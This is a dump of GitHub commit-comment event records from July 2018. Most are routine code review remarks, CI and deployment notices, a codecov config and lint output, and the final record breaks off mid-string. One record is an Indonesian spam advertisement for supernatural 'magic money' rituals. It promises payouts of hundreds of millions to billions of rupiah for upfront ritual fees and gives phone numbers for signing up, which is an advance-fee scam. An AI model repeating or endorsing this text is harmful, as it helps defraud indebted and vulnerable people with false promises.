{"id":"8036791737","type":"CommitCommentEvent","actor":{"login":"HotIceCream"},"repo":{"name":"iliailemkov/CurrencyHolder"},"payload":{"comment":{"id":29884527,"position":29,"line":29,"path":"app/src/main/java/com/example/beardie/currencyholder/domain/BalanceInteractor.kt","commit_id":"951ac7dd66a3db11af903758a5cdfd93c7cb26f9","created_at":"2018-07-30T10:17:53Z","updated_at":"2018-07-30T10:17:53Z","author_association":"NONE","body":"А в каком потоке выполняется добавление в бд? \r\nХорошо, если не в гланом, т.к. это работа с бд (в будущем). Но тогда зачем асинхронный поход в сеть? \r\n"}},"created_at":"2018-07-30T10:17:53Z"}
{"id":"8036794465","type":"CommitCommentEvent","actor":{"login":"HotIceCream"},"repo":{"name":"iliailemkov/CurrencyHolder"},"payload":{"comment":{"id":29884534,"position":40,"line":40,"path":"app/src/main/java/com/example/beardie/currencyholder/domain/BalanceInteractor.kt","commit_id":"951ac7dd66a3db11af903758a5cdfd93c7cb26f9","created_at":"2018-07-30T10:18:28Z","updated_at":"2018-07-30T10:18:28Z","author_association":"NONE","body":"Очень не очевидное поведение. Т.е. пользователь сохраняет транзакцию. А она не сохраняется:(\r\n"}},"created_at":"2018-07-30T10:18:28Z"}
{"id":"8036798905","type":"CommitCommentEvent","actor":{"login":"Heidistein"},"repo":{"name":"Heidistein/puppet-logrotate"},"payload":{"comment":{"id":29884542,"position":4,"line":5,"path":"spec/defines/conf_spec.rb","commit_id":"d2f87cdbdd566a84d814de5a5f7afff71cc60548","created_at":"2018-07-30T10:19:20Z","updated_at":"2018-07-30T10:19:20Z","author_association":"OWNER","body":"This was unintended. "}},"created_at":"2018-07-30T10:19:20Z"}
{"id":"8036807673","type":"CommitCommentEvent","actor":{"login":"sinny777"},"repo":{"name":"sinny777/profile"},"payload":{"comment":{"id":29884565,"position":null,"line":null,"path":null,"commit_id":"aca5399032663d8a9ef8273c67526dec94400612","created_at":"2018-07-30T10:21:08Z","updated_at":"2018-07-30T10:21:08Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/54dc1869-9fc9-47a7-99e9-42bb54703fd1?env_id=ibm%3Ayp%3Aus-south \"all-about-gurvinder\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/da1551f6-cb67-47a6-9d9b-90e55ea03d09?env_id=ibm%3Ayp%3Aus-south \"profile\") deployed [profile](https://github.com/sinny777/profile/releases/tag/deploy-ibm-yp-us-south-sinny777-gmail.com-dev-20180730-102107 \"deploy-ibm-yp-us-south-sinny777-gmail.com-dev-20180730-102107\") to [dev](https://console.bluemix.net/apps/c1a52446-832b-4bcd-8c5f-796db62d8575?env_id=ibm:yp:us-south \"ibm:yp:us-south:sinny777@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-30T10:21:08Z"}
{"id":"8036807994","type":"CommitCommentEvent","actor":{"login":"shohanshohan"},"repo":{"name":"shohanshohan/github-slideshow"},"payload":{"comment":{"id":29884567,"position":null,"line":null,"path":null,"commit_id":"b4a3819d0c1046d720240771de9437cd99955734","created_at":"2018-07-30T10:21:12Z","updated_at":"2018-07-30T10:21:12Z","author_association":"OWNER","body":"how to merge pull request"}},"created_at":"2018-07-30T10:21:12Z"}
{"id":"8036810796","type":"CommitCommentEvent","actor":{"login":"MattBee78"},"repo":{"name":"MattBee78/Password-Checker"},"payload":{"comment":{"id":29884570,"position":null,"line":null,"path":null,"commit_id":"8dcaf0c55ead2eec7f8410d0f07be7d9d1e2e12f","created_at":"2018-07-30T10:21:47Z","updated_at":"2018-07-30T10:21:47Z","author_association":"OWNER","body":"This works for length, capital and lowercase letters and number.\r\nStill working out how best to ensure special characters are identified.\r\nthen need to work out how to ensure 3 out of the 4 are true."}},"created_at":"2018-07-30T10:21:47Z"}
{"id":"8036817264","type":"CommitCommentEvent","actor":{"login":"borncharmerx"},"repo":{"name":"borncharmerx/runFastK-master"},"payload":{"comment":{"id":29884579,"position":null,"line":null,"path":null,"commit_id":"d902fbe783bb06d68566ccc842f2f331050c764c","created_at":"2018-07-30T10:23:06Z","updated_at":"2018-07-30T10:23:06Z","author_association":"OWNER","body":"codecov:\r\n  notify:\r\n    require_ci_to_pass: yes\r\n\r\ncoverage:\r\n  precision: 2\r\n  round: down\r\n  range: \"70...100\"\r\n\r\n  status:\r\n    project: yes\r\n    patch: yes\r\n    changes: no\r\n\r\nparsers:\r\n  gcov:\r\n    branch_detection:\r\n      conditional: yes\r\n      loop: yes\r\n      method: no\r\n      macro: no\r\n\r\ncomment:\r\n  layout: \"header, diff\"\r\n  behavior: default\r\n  require_changes: no"}},"created_at":"2018-07-30T10:23:06Z"}
{"id":"8036817969","type":"CommitCommentEvent","actor":{"login":"agentlewis"},"repo":{"name":"root-systems/cobuy-atomic"},"payload":{"comment":{"id":29884580,"position":null,"line":null,"path":null,"commit_id":"ca222199b62dc30eda0d2d22233ace5d218d0ab8","created_at":"2018-07-30T10:23:14Z","updated_at":"2018-07-30T10:23:14Z","author_association":"CONTRIBUTOR","body":"Only commit code that is part of the solution. copy/pasted code that is obviously wrong shouldn't be committed until it is fixed. If you feel the need to have the files ready to go you can replace with a Todo comment. eg for you it would be\r\n\r\n```JS\r\nexport default {\r\n  \"$schema\": \"http://json-schema.org/schema#\",\r\n  \"type\": \"object\",\r\n  \"properties\": {\r\n    \"color\": {\r\n      \"type\": \"string\"\r\n    }\r\n    // Todo add the rest properties from indexjs\r\n  },\r\n  \"required\": [\"color\"]\r\n}\r\n```"}},"created_at":"2018-07-30T10:23:14Z"}
{"id":"8036820211","type":"CommitCommentEvent","actor":{"login":"baffioso"},"repo":{"name":"regiongis/python_helpers"},"payload":{"comment":{"id":29884585,"position":null,"line":null,"path":null,"commit_id":"7e41d135180e1eb9047b67ec21b9738d12664653","created_at":"2018-07-30T10:23:43Z","updated_at":"2018-07-30T10:23:43Z","author_association":"NONE","body":"Mener der gøres med index_label"}},"created_at":"2018-07-30T10:23:43Z"}
{"id":"8036820353","type":"CommitCommentEvent","actor":{"login":"RollingSquirrel"},"repo":{"name":"RollingSquirrel/hello-world"},"payload":{"comment":{"id":29884586,"position":null,"line":null,"path":null,"commit_id":"0a500725c3b0f9e9d8a53ecc9bce03884007b6da","created_at":"2018-07-30T10:23:45Z","updated_at":"2018-07-30T10:23:45Z","author_association":"OWNER","body":"Here are great comments!"}},"created_at":"2018-07-30T10:23:45Z"}
{"id":"8036852643","type":"CommitCommentEvent","actor":{"login":"ktisha"},"repo":{"name":"phoenix-asv/edu-server"},"payload":{"comment":{"id":29884642,"position":26,"line":26,"path":"edu_server/server/models.py","commit_id":"8ff20bd6be2c554c4c8f3fcd63a09ab0d7df9e5f","created_at":"2018-07-30T10:30:41Z","updated_at":"2018-07-30T10:30:41Z","author_association":"COLLABORATOR","body":"Explanation needed"}},"created_at":"2018-07-30T10:30:41Z"}
{"id":"8036854307","type":"CommitCommentEvent","actor":{"login":"edo9300"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":29884645,"position":null,"line":null,"path":null,"commit_id":"5a2958c64e392cc83536d5f835b264abfbe4afbe","created_at":"2018-07-30T10:31:02Z","updated_at":"2018-07-30T10:31:02Z","author_association":"CONTRIBUTOR","body":"So? _i'm still waiting for clarifications_"}},"created_at":"2018-07-30T10:31:02Z"}
{"id":"8036860947","type":"CommitCommentEvent","actor":{"login":"Ryzl001"},"repo":{"name":"Ryzl001/devconnector"},"payload":{"comment":{"id":29884657,"position":58,"line":85,"path":"routes/api/profile.js","commit_id":"a0652f0d9011d64faad93824397e922eebd4e2c6","created_at":"2018-07-30T10:32:28Z","updated_at":"2018-07-30T10:32:28Z","author_association":"OWNER","body":"szukanie w bazie nie po ID"}},"created_at":"2018-07-30T10:32:28Z"}
{"id":"8036863669","type":"CommitCommentEvent","actor":{"login":"kangtom"},"repo":{"name":"kangtom/fabric"},"payload":{"comment":{"id":29884660,"position":null,"line":null,"path":null,"commit_id":"3436f454f2a3c54e7c159abb083d5fde06ad727e","created_at":"2018-07-30T10:33:05Z","updated_at":"2018-07-30T10:33:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [比特币和数字货币技术](https://trello.com/c/YbeVmo0Q/4-%E6%AF%94%E7%89%B9%E5%B8%81%E5%92%8C%E6%95%B0%E5%AD%97%E8%B4%A7%E5%B8%81%E6%8A%80%E6%9C%AF)"}},"created_at":"2018-07-30T10:33:05Z"}
{"id":"8036863680","type":"CommitCommentEvent","actor":{"login":"kangtom"},"repo":{"name":"kangtom/fabric"},"payload":{"comment":{"id":29884661,"position":null,"line":null,"path":null,"commit_id":"3436f454f2a3c54e7c159abb083d5fde06ad727e","created_at":"2018-07-30T10:33:05Z","updated_at":"2018-07-30T10:33:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [比特币和数字货币技术](https://trello.com/c/YbeVmo0Q/4-%E6%AF%94%E7%89%B9%E5%B8%81%E5%92%8C%E6%95%B0%E5%AD%97%E8%B4%A7%E5%B8%81%E6%8A%80%E6%9C%AF)"}},"created_at":"2018-07-30T10:33:05Z"}
{"id":"8036877638","type":"CommitCommentEvent","actor":{"login":"suzugumi"},"repo":{"name":"suzugumi/zlooong"},"payload":{"comment":{"id":29884685,"position":null,"line":null,"path":null,"commit_id":"5694bb5acbeac50650185872d3c9eb9f6faa68df","created_at":"2018-07-30T10:36:09Z","updated_at":"2018-07-30T10:36:09Z","author_association":"OWNER","body":"kmk"}},"created_at":"2018-07-30T10:36:09Z"}
{"id":"8036884601","type":"CommitCommentEvent","actor":{"login":"iliailemkov"},"repo":{"name":"iliailemkov/CurrencyHolder"},"payload":{"comment":{"id":29884702,"position":22,"line":24,"path":"app/src/main/java/com/example/beardie/currencyholder/BaseApplication.kt","commit_id":"951ac7dd66a3db11af903758a5cdfd93c7cb26f9","created_at":"2018-07-30T10:37:42Z","updated_at":"2018-07-30T10:37:42Z","author_association":"OWNER","body":"инициализируется сам, а ловить необработанные ошибки надо самому"}},"created_at":"2018-07-30T10:37:42Z"}
{"id":"8036884853","type":"CommitCommentEvent","actor":{"login":"imomushi123"},"repo":{"name":"imomushi123/assessment"},"payload":{"comment":{"id":29884703,"position":null,"line":null,"path":null,"commit_id":"e373909fffbbf7b17f538d31636228fc33433805","created_at":"2018-07-30T10:37:45Z","updated_at":"2018-07-30T10:37:45Z","author_association":"OWNER","body":"e373909 で対応しました。"}},"created_at":"2018-07-30T10:37:45Z"}
{"id":"8036895941","type":"CommitCommentEvent","actor":{"login":"spmallette"},"repo":{"name":"apache/tinkerpop"},"payload":{"comment":{"id":29884736,"position":8,"line":68,"path":"gremlin-javascript/src/main/javascript/gremlin-javascript/lib/structure/io/type-serializers.js","commit_id":"db46c0f67fb1f93b9ea76032dbd2a852c24effd4","created_at":"2018-07-30T10:40:10Z","updated_at":"2018-07-30T10:40:10Z","author_association":"CONTRIBUTOR","body":"yes - i realized my mistake after i'd pushed :/ \r\n\r\nhere's the follow-on fix: https://github.com/apache/tinkerpop/blob/3b8c8280cab1e7a6fd3b273ef0d2cf2c6d00f650/gremlin-javascript/src/main/javascript/gremlin-javascript/lib/structure/io/type-serializers.js#L68"}},"created_at":"2018-07-30T10:40:10Z"}
{"id":"8036901661","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29884745,"position":null,"line":null,"path":null,"commit_id":"b39b8a65b9dcffbdb1ba3f395fb46b1c0799ba35","created_at":"2018-07-30T10:41:27Z","updated_at":"2018-07-30T10:41:27Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-94](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-94).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-94-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-30T10:41:27Z"}
{"id":"8036903891","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29884748,"position":4,"line":70,"path":"xwiki-platform-core/xwiki-platform-activitystream/xwiki-platform-activitystream-ui/pom.xml","commit_id":"ac297d966780d5aa953c883f735cb04ebde3cef7","created_at":"2018-07-30T10:41:56Z","updated_at":"2018-07-30T10:41:56Z","author_association":"MEMBER","body":"hmm I keep removing those. Could we agree to not have any newline in pom.xml files? :)"}},"created_at":"2018-07-30T10:41:56Z"}
{"id":"8036908951","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29884759,"position":4,"line":70,"path":"xwiki-platform-core/xwiki-platform-activitystream/xwiki-platform-activitystream-ui/pom.xml","commit_id":"ac297d966780d5aa953c883f735cb04ebde3cef7","created_at":"2018-07-30T10:43:04Z","updated_at":"2018-07-30T10:43:04Z","author_association":"MEMBER","body":"I really don't see why. I find it way clearer to visually separate compile dependencies and test dependencies."}},"created_at":"2018-07-30T10:43:04Z"}
{"id":"8036909282","type":"CommitCommentEvent","actor":{"login":"iliailemkov"},"repo":{"name":"iliailemkov/CurrencyHolder"},"payload":{"comment":{"id":29884762,"position":22,"line":22,"path":"app/src/main/java/com/example/beardie/currencyholder/data/ExchangeRepository.kt","commit_id":"951ac7dd66a3db11af903758a5cdfd93c7cb26f9","created_at":"2018-07-30T10:43:08Z","updated_at":"2018-07-30T10:43:08Z","author_association":"OWNER","body":"хорошо.\r\n\r\nне было времени разобраться с rx (и лекции пока тоже не было) поэтому сделал как умел через callback (после лекции скорее всего переделаю)"}},"created_at":"2018-07-30T10:43:08Z"}
{"id":"8036913402","type":"CommitCommentEvent","actor":{"login":"udan11"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29884770,"position":5,"line":3793,"path":"config/locales/server.en.yml","commit_id":"159266ae6678c979c460019277782218dda3ea7d","created_at":"2018-07-30T10:44:03Z","updated_at":"2018-07-30T10:44:03Z","author_association":"CONTRIBUTOR","body":"Well... that's how [it](https://github.com/discourse/discourse/blob/a6c589d882852368d7add70b13040a604a9a5b72/config/discourse_defaults.conf#L100) is called."}},"created_at":"2018-07-30T10:44:03Z"}
{"id":"8036915620","type":"CommitCommentEvent","actor":{"login":"mbah-jarwo"},"repo":{"name":"mbah-jarwo/mbah-jarwo"},"payload":{"comment":{"id":29884779,"position":null,"line":null,"path":null,"commit_id":"282b20dc177e2c7531d1474a487ad68b984b694e","created_at":"2018-07-30T10:44:34Z","updated_at":"2018-07-30T10:44:34Z","author_association":"OWNER","body":"\r\n\r\nPENGERTIAN PESUGIHAN DARI AKI HANTORO SALAH SATU DUKUN TERSAKTI DI INDONESIA | UNTUK KONSULTASI LANGSUNG DENGAN MBAH JARWO CALL : 082-393-790-123\r\n\r\nASSALAMUALAIKUM WARAHMATULLAHI WABARAKATU\r\n\r\nSELAMAT DATANG DI WEBSITE PARANORMAL\r\n\"MBAH JARWO\"\r\n\r\nPernahkah Anda menemukan seseorang yang hidupnya sukses, padahal kerja yang dilakukannya tidak seberapa? Sementara di sisi lain Anda sudah berusaha sedemikian rupa tetapi belum juga mendapatkan hasil yang memuaskan? Anda pasti bertanya-tanya, mengapa bisa demikian?\r\n\r\nPesugihan Uang Gaib - Mungkin Anda Merupakan Salah Satu Orang Yang Sangat Beruntung Jika Menemukan Blog Atau Situs Ini Sesuai Dengan Kata Kunci \"Dukun Sakti MBAH JARWO\" Dimana Anda Dapat Menemukan Berbagai Macam Solusi Yang Tepat Untuk Mengatasi Masalah Keekonomian Anda Serta Membuat Hidup Anda Akan Jadi lebih Baik Dari Sebelumnya.\r\n\r\npesugihan uang gaib\r\n\r\nPengertian Pesugihan Adalah Pesugihan Yang Dilakukan Oleh Seseorang Yang Ingin Mendapatkan Kekayaan Dengan Cara Cepat Tanpa Melibatkan Nyawa Atau Tumbal Serta Tidak Dilanggar Oleh Agama Manapun, mengapa demikian??? Karna pesugihan ini adalah pesugihan dari golongan putih. Adapun pesugihan bank gaib yang bisa menjadikan anda menjadi kaya raya cukup dengan menyediakan nomor rekening saja setelah uang sudah cair maka rekening yang tadinya sudah anda siapkan uang gaib tersebut akan langsung mengalir dengan cepat setelah dibacakan mantra.\r\n\r\n    AKI HANTORO HANYA AKAN MENOLONG ANDA YANG BENAR-BENAR SIAP MENTAL, NYALI DAN BIAYA (UBORAMPE). TANPA RASA SALING PERCAYA, KERJASAMA & PROFESIONALISME MAKA JALAN MENUJU SUKSES MENUJU KE GERBANG KEKAYAAN AKAN SEMAKIN SULIT.\r\n\r\nBaca Juga!!!\r\n- Dukun Santet Ampuh\r\n- Dukun Pelet Ampuh\r\n\r\nDunia yang akan mewujudkan impian anda dalam sekejap dan menuntaskan masalah keuangan anda dalam waktu yang singkat. Mungkin tidak pernah terpikir dalam hidup kita untuk menyentuh hal hal seperti ini. Ketika kekuasaan, uang dalam genggaman semua bisa dikendalikan sesuai keinginan kita. Semua bisa diselesaikan secara logika. Tapi akankah logika selalu bisa menyelesaikan masalah kita. Ya... Ketika kita punya uang. MBAH JARWO percaya itu cuma tinggal cerita lalu, ketika anda membaca blog ini kami yakin anda saat ini adalah orang yang kalah dalam persaingan, bisnis bangkrut, hutang menumpuk, harta habis tersita, keluarga berantakan. Untuk itu, saya akan berikan solusi untuk anda.\r\n\r\nBagi anda yang sedang terlilit hutang piutang atau sedang butuh modal usaha maka saya siap membantu saudara-saudari dalam Cara Mendatangkan Uang Gaib Di Dunia Nyata.\r\n\r\npesugihan uang gaib\r\n\r\nSyarat dan Ketentuan:\r\n- Usia minimal 20 tahun\r\n- Punya Hutang Banyak\r\n- Butuh Modal Usaha\r\n- Siap menyelesaikan biaya ritual (uborampe) yang sudah di sampaikan\r\n- Ritual Jarak Jauh (Terima Jadi)\r\n- Menyediakan buku tabungan (rekening)\r\nSetelah dana cair maka akan langsung disetor tunai ke rekening anda. maksimal 1 hari setelah setelah ritual.\r\n\r\nHasil dan Biaya Ritual:\r\n- Hasil Penarikan 100 juta - 500 juta Biaya Ritual 1 juta\r\n- Hasil Penarikan 500 juta - 1 milyar Biaya Ritual 2 juta\r\n- Hasil Penarikan 1 milyar - 3 milyar Biaya Ritual 3 juta\r\n- Hasil Penarikan 3 milyar - 5 milyar Biaya Ritual 4 juta\r\n- Hasil Penarikan 5 milyar - 10 milyar Biaya Ritual 5 juta\r\n\r\nCara Daftar:\r\nCara daftar: Ketik: Nama#Alamat#Umur#Weton (hari dan pasaran)#Pesugihan terima Jadi#Paket Biaya Kirim Ke: 082-393-790-123 A/N MBAH JARWO\r\n\r\nSETELAH DANA CAIR MAKA AKAN LANGSUNG DISETOR TUNAI KE REKENING ANDA. MAKSIMAL 1 HARI SETELAH SELESAI RITUAL.\r\n\r\nPesugihan Uang Gaib.png\r\n\r\nCatatan Penting:\r\n- Pesugihan ini dibutuhkan Tekat, niat dan kesabaran\r\n- Apabila gagal maka biaya akan kami kembalikan 2 kali lipat\r\n- Apabila kami telat dalam mentransfer dana maka uang hasil akan kami tambah 5%\r\n\r\nBagi anda yg tertarik ingin mengambil program ini, MBAH JARWO memberikan dua alternatif, alternatif pertama, jika pelaku memiliki banyak waktu & mau sabar menunggu, pelaku bisa datang langsung ke tempat pratek, atau alternatif ke dua jika pelaku tidak mempunyai banyak waktu & keperluan uang sangat mendesak, maka Mbah Jarwo menyarankan melalui jarak jauh saja.\r\n\r\nJIKA ANDA BERMINAT DENGAN PROGRAM KAMI!!!\r\nSILAHKAN KONSULTASIKAN DENGAN AKI HANTORO\r\nCALL/SMS/WHATSAPP: 082-343-555-848\r\n\r\n#Anda pasti berpikir kenapa kami meminta mahar padahal kami sudah mempunyai banyak uang. Uang mahar/biaya yang anda selesaikan jujur bukan untuk kami, Tapi untuk membeli alat-alat sesajen buat ritual anda sendiri dan sebagian kami sumbangkang ke panti sosial. Mahar yang anda keluarkan tidak sebanding dengan hasil yang anda peroleh nantinya.\r\n\r\nINGAT!!! ALLAH TIDAK AKAN MERUBAH NASIB MANUSIA, SEBELUM DIRINYA SENDIRI MERUBAHNYA.\r\nKAMI MEMBERIKAN BUKTI/BUKAN JANJI DAN MENJAMIN KEBERHASILANNYA.\r\n"}},"created_at":"2018-07-30T10:44:34Z"}
{"id":"8036916106","type":"CommitCommentEvent","actor":{"login":"chise8"},"repo":{"name":"chise8/assessment"},"payload":{"comment":{"id":29884780,"position":null,"line":null,"path":null,"commit_id":"0b15ff945f6c21b21cd5da26149b0b8ad7349b8c","created_at":"2018-07-30T10:44:40Z","updated_at":"2018-07-30T10:44:40Z","author_association":"OWNER","body":"#1  に対する対応を行いました"}},"created_at":"2018-07-30T10:44:40Z"}
{"id":"8036925563","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29884810,"position":14,"line":13,"path":"main/duply/APKBUILD","commit_id":"260588b80c0d163479c7f1523ff175e0cd426254","created_at":"2018-07-30T10:46:52Z","updated_at":"2018-07-30T10:46:52Z","author_association":"MEMBER","body":"There's no such option. It should be `!check`."}},"created_at":"2018-07-30T10:46:52Z"}
{"id":"8036939918","type":"CommitCommentEvent","actor":{"login":"devosray"},"repo":{"name":"TripleParity/docks-ui"},"payload":{"comment":{"id":29884838,"position":null,"line":null,"path":null,"commit_id":"0752c36ce75f5455154629649a8caa363d79c932","created_at":"2018-07-30T10:50:06Z","updated_at":"2018-07-30T10:50:06Z","author_association":"CONTRIBUTOR","body":"I don't notice any memory issues while having the `/tasks/list` page open. Is this still an issue for you?"}},"created_at":"2018-07-30T10:50:06Z"}
{"id":"8036939995","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"ResurrectionRemix-Devices/device_xiaomi_helium"},"payload":{"comment":{"id":29884839,"position":5,"line":32,"path":"overlay-lineage/frameworks/base/core/res/res/values/config.xml","commit_id":"281c86b70ed90cef6b325bca6828e98819a46c6b","created_at":"2018-07-30T10:50:07Z","updated_at":"2018-07-30T10:50:07Z","author_association":"MEMBER","body":"Helium has OLED screen?"}},"created_at":"2018-07-30T10:50:07Z"}
{"id":"8036941444","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29884842,"position":4,"line":70,"path":"xwiki-platform-core/xwiki-platform-activitystream/xwiki-platform-activitystream-ui/pom.xml","commit_id":"ac297d966780d5aa953c883f735cb04ebde3cef7","created_at":"2018-07-30T10:50:24Z","updated_at":"2018-07-30T10:50:24Z","author_association":"MEMBER","body":"Because it's very hard to find a common rule that applies everywhere to all cases. \r\n\r\nYou also cannot easily know if the comment applies to one line below or to multiple lines.\r\n\r\nOriginally I was like you but quickly I didn't find it a problem at all to not have new lines and it has never prevented me from quickly reading. Not mentioning that we have XML readers in IDEs so it's even less needed.\r\n\r\nFor ex in your case can you explain why you need to have the test deps more visible, than, say, the non test deps or the build section, or the dep mgmt section, or the project name or the version etc?"}},"created_at":"2018-07-30T10:50:24Z"}
{"id":"8036944046","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29884849,"position":4,"line":70,"path":"xwiki-platform-core/xwiki-platform-activitystream/xwiki-platform-activitystream-ui/pom.xml","commit_id":"ac297d966780d5aa953c883f735cb04ebde3cef7","created_at":"2018-07-30T10:50:57Z","updated_at":"2018-07-30T10:50:57Z","author_association":"MEMBER","body":"So my main rationale is consistency"}},"created_at":"2018-07-30T10:50:57Z"}
{"id":"8036944241","type":"CommitCommentEvent","actor":{"login":"scolladon"},"repo":{"name":"scolladon/sfdc-generate-package"},"payload":{"comment":{"id":29884851,"position":null,"line":null,"path":null,"commit_id":"d2506fbef7385d0319027a6b83c8b78335eda72c","created_at":"2018-07-30T10:51:00Z","updated_at":"2018-07-30T10:51:00Z","author_association":"OWNER","body":"closes #8 "}},"created_at":"2018-07-30T10:51:00Z"}
{"id":"8036944673","type":"CommitCommentEvent","actor":{"login":"walezy"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29884854,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-30T10:51:05Z","updated_at":"2018-07-30T10:51:05Z","author_association":"NONE","body":"Great project am glad to be part of it"}},"created_at":"2018-07-30T10:51:05Z"}
{"id":"8036949873","type":"CommitCommentEvent","actor":{"login":"Macintosh-c"},"repo":{"name":"Macintosh-c/Macintosh-c.github.io"},"payload":{"comment":{"id":29884865,"position":null,"line":null,"path":null,"commit_id":"485a2b604ce3e41086f6bb9448adce1858c346a2","created_at":"2018-07-30T10:52:15Z","updated_at":"2018-07-30T10:52:15Z","author_association":"OWNER","body":"新增第一篇文章"}},"created_at":"2018-07-30T10:52:15Z"}
{"id":"8036949901","type":"CommitCommentEvent","actor":{"login":"oliver----"},"repo":{"name":"substance/texture"},"payload":{"comment":{"id":29884866,"position":43,"line":54,"path":"src/article/metadata/SelectInput.js","commit_id":"7e7b94b2ef35d275c78e0e07a8592f3b265c5212","created_at":"2018-07-30T10:52:15Z","updated_at":"2018-07-30T10:52:15Z","author_association":"MEMBER","body":"If this is causing trouble then you can disable it."}},"created_at":"2018-07-30T10:52:15Z"}
{"id":"8036958771","type":"CommitCommentEvent","actor":{"login":"seungjuchae"},"repo":{"name":"seungjuchae/test"},"payload":{"comment":{"id":29884876,"position":null,"line":null,"path":null,"commit_id":"f4fb3eddd020a73c1db955b403d6008b0b43ba20","created_at":"2018-07-30T10:54:20Z","updated_at":"2018-07-30T10:54:20Z","author_association":"OWNER","body":"dasdas"}},"created_at":"2018-07-30T10:54:20Z"}
{"id":"8036960682","type":"CommitCommentEvent","actor":{"login":"sunwu1995"},"repo":{"name":"sunwu1995/myproject"},"payload":{"comment":{"id":29884881,"position":null,"line":null,"path":null,"commit_id":"52dd39a11636ec2ccf232114e2e0adcebe2aac06","created_at":"2018-07-30T10:54:45Z","updated_at":"2018-07-30T10:54:45Z","author_association":"OWNER","body":"this sfaljfldjaljflasjflaj "}},"created_at":"2018-07-30T10:54:45Z"}
{"id":"8036963184","type":"CommitCommentEvent","actor":{"login":"Macintosh-c"},"repo":{"name":"Macintosh-c/Macintosh-c.github.io"},"payload":{"comment":{"id":29884883,"position":null,"line":null,"path":null,"commit_id":"d7fe7d935d65344268e90675114dd7be94eeaa6c","created_at":"2018-07-30T10:55:17Z","updated_at":"2018-07-30T10:55:17Z","author_association":"OWNER","body":"修改主题为jacman"}},"created_at":"2018-07-30T10:55:17Z"}
{"id":"8036969079","type":"CommitCommentEvent","actor":{"login":"Integral"},"repo":{"name":"substance/texture"},"payload":{"comment":{"id":29884902,"position":43,"line":54,"path":"src/article/metadata/SelectInput.js","commit_id":"7e7b94b2ef35d275c78e0e07a8592f3b265c5212","created_at":"2018-07-30T10:56:36Z","updated_at":"2018-07-30T10:56:36Z","author_association":"MEMBER","body":"thx"}},"created_at":"2018-07-30T10:56:36Z"}
{"id":"8036974075","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29884911,"position":4,"line":70,"path":"xwiki-platform-core/xwiki-platform-activitystream/xwiki-platform-activitystream-ui/pom.xml","commit_id":"ac297d966780d5aa953c883f735cb04ebde3cef7","created_at":"2018-07-30T10:57:41Z","updated_at":"2018-07-30T10:57:41Z","author_association":"MEMBER","body":"Anyway we should probably discuss this on the devs list and decide what we want to do. We could also decide to not do anything but we'll keep adding and removing empty lines ;)"}},"created_at":"2018-07-30T10:57:41Z"}
{"id":"8037004465","type":"CommitCommentEvent","actor":{"login":"SkyFire"},"repo":{"name":"ProjectSkyfire/SkyFire.548"},"payload":{"comment":{"id":29884985,"position":13,"line":13,"path":"sql/updates/world/2018_07_30_01_world.sql","commit_id":"32299b2d496f2b6a5062658d777d6afc717fd8a1","created_at":"2018-07-30T11:04:17Z","updated_at":"2018-07-30T11:04:17Z","author_association":"MEMBER","body":"Eipc fial."}},"created_at":"2018-07-30T11:04:17Z"}
{"id":"8037008365","type":"CommitCommentEvent","actor":{"login":"YuanlinLi"},"repo":{"name":"YuanlinLi/root"},"payload":{"comment":{"id":29884994,"position":null,"line":null,"path":null,"commit_id":"16765a3c4cd93c09158ffd32dbe9a97566d2a982","created_at":"2018-07-30T11:05:13Z","updated_at":"2018-07-30T11:05:13Z","author_association":"OWNER","body":"There remains nothing to knowledge."}},"created_at":"2018-07-30T11:05:13Z"}
{"id":"8037010625","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29885002,"position":null,"line":null,"path":null,"commit_id":"1b810705475d3dd14100ede21430d567d44a0a3d","created_at":"2018-07-30T11:05:42Z","updated_at":"2018-07-30T11:05:42Z","author_association":"NONE","body":"[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of 